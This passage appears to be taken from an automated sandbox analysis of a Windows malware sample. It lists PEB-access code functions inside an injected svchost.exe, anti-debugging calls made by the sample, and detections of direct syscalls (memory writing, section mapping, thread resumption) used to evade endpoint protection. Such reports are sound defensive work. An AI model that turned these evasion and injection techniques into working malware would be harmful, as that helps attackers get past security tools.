                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]2_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]2_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]2_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]2_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h]2_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]2_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]2_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h]2_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]2_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]2_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]2_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]2_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]2_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]2_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]2_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]2_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]2_2_03C6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]2_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]2_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]2_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h]2_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]2_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]2_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]2_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]2_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h]2_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]2_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]2_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]2_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]2_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
